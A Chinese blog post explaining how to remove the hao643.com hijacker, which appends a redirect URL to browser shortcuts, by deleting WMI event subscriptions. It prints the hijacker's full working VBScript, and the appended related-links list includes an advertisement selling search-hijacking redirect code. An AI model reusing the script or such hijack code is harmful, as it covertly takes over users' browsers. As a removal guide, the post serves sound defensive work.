hao643.com劫持(修改快捷方式跳转至hao123.com)
>症状:
所有浏览器快捷方式,都被加上尾巴,例如IE的:"C:\Program Files\Internet Explorer\iexplore.exe" http://hao643.com/?r=ggggg&m=c104
手工去掉尾巴后,每隔一定时间(网友说是30分钟)后,尾巴重新被加上。
PS:这病毒仅修改快捷方式,应该没有其它病毒特征。
>解决方案:
1.安装WMITools(点击下载)
2.管理员身份打开 C:\Program Files (x86)\WMI Tools\wbemeventviewer.exe
3.点击左上角按钮register for events
4.OK--OK
5.第1个下拉菜单有3个选择项:Consumers、Filters、Timers
6.把这3个选择项下的所有实例全部删除(右键菜单,Delete instance)
7.去掉所有浏览器快捷方式的尾巴--涉及浏览器:114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8.Done.
>参考:
http://www.pc18.com/soft/15730.html
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
>附 病毒脚本
1 On Error Resume Next:Const link = "http://hao643.com/?r=ggggg&m=c104":Const link360 = "http://hao643.com/?r=ggggg&m=c104&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ChenShao\Desktop,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ChenShao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
View Code
>PS:
大学期间,hao123是我非常非常喜欢的网站,帮人装完系统之后,都把它设置为主页;百度收购之后,好感度下降,但还用着;发现它恶意推广之后,此生再也没打开过hao123(被强制弹出的除外)。
转载于:https://www.cnblogs.com/chenshao/p/6854790.html
hao643.com劫持(修改快捷方式跳转至hao123.com)相关推荐
- Chrome主页被http://hl2.gndh111.top/劫持,自动跳转hao123的解决办法
前言 昨天晚上打开电脑准备划水,结果一打开浏览器,就发现它自动打开一个新的链接,紧接着又跳转到一个特定网页上去了.小编心里那个气啊,打开百度一顿搜索,试了各种方法都不行,Google Chrome三卸 ...
- 浏览器主页被劫持,强制跳转hao123
打开谷歌浏览器默认跳转到hao123主页,有时候其他网页进来直接被劫持到hao123了,网上的方法试过很多 比如删除注册表,快捷方式后缀修改 终极解决方案 先给 C:\Windows\system32 ...
- 安卓Android 7.1.1 shortcut实现桌面图标快捷方式跳转,类似IOS 3d touch
一.背景介绍: 3D Touch是一种立体触控技术,被苹果称为新一代多点触控技术,是在Apple Watch上采用的Force Touch,屏幕可感应不同的感压力度触控.3D Touch,苹果iPho ...
- 百度搜狗神马搜索劫持 来源网站跳转 快照霸屏 竞价劫持 霸屏代码
伪百度搜索,伪神马搜索,伪搜狗竞价返回跳转 点击咨询qq 2928405877 百度搜狗神马搜索劫持 来源网站跳转 快照霸屏 竞价劫持 主要是针对百度,搜狗,神马竞价用户,就是通过竞价进入你们网站,客 ...
- 解决Chrome或Microsoft Edge浏览器打开时自动跳转到hao123
解决Chrome或Microsoft Edge浏览器打开时自动跳转到hao123 打开chrome.exe或msedge.exe的安装路径 右键桌面快捷方式或者开始页面上的快捷方式: 选择更多: 打开 ...
- 解决google打开以后跳转到hao123
google打开以后跳转到hao123 最近打开谷歌浏览器后会自动跳转到hao123,出现如下画面,就很烦.网上查到很多方法,发现复杂而且可用性低. 简单说两个方法在此. 方法一: 找到chrome快 ...
- 跟主页劫持的浏览器再见了,被恶意劫持修改方法!
最近重装了一次电脑.尽管什么百度系的软件我都没有下载,Chrome浏览器的主页还是被硬生生劫持了.每次点开后的主页是hao.qquu8.com这个链接,紧接着它会跳向hao123.电脑上原装的其他浏览 ...
- 介绍一个浏览器被劫持后不能跳转到主页的处理方法
如果你发现自己的浏览器打开后会首先跳转到一个不知名网址一秒后又转到2345 hao123这种网站,那么说明你的浏览器已经被某些恶意插件劫持了,无论我们怎么改启动时打开的网址浏览器都是跳转到这种2345 ...
- DNS劫持及网页跳转到莫名站点时应该怎么办?(DNS劫持和HTTP劫持及解决方法)
如有更新及改动请参考我的博客原文 https://alvincr.com/2021/01/dns%e7%9b%b8%e5%85%b3%e7%9f%a5%e8%af%86%e4%b8%aa%e4%ba% ...
最新文章
- 1.4 Padding-深度学习第四课《卷积神经网络》-Stanford吴恩达教授
- 中国海洋生物医药产业专项应用调研及战略展望规划分析报告2021-2027年
- 大佬的引用。。。。太猛了啊
- SAP Spartacus unit detail 页面显示后自动 focus 设置的原理
- JavaScript随笔一篇
- Scrapy 教程(十)-管道与数据库
- Python获取硬件信息(硬盘序列号,CPU序列号)
- [BZOJ2655] calc
- pta c语言 凯撒密码
- 深度学习笔记(17) 误差分析(二)
- Python中去除字符串中空格的方法
- H3C 命令行历史记录功能
- GetCommandLine()和CommandLineToArgvW()
- 12代酷睿不再“挤牙膏”,能为英特尔vPro远程办公带来什么?
- 互联网、云计算之用户服务
- 如何使用DDexec在Linux上隐蔽运行二进制文件
- ArcGIS Pro基本操作教程(一)
- 前端复习之HTML5
- 市场调研 2.DAU、MAU、ARPU等究竟是什么
- 【Tableau 图表大全1.0】之条形图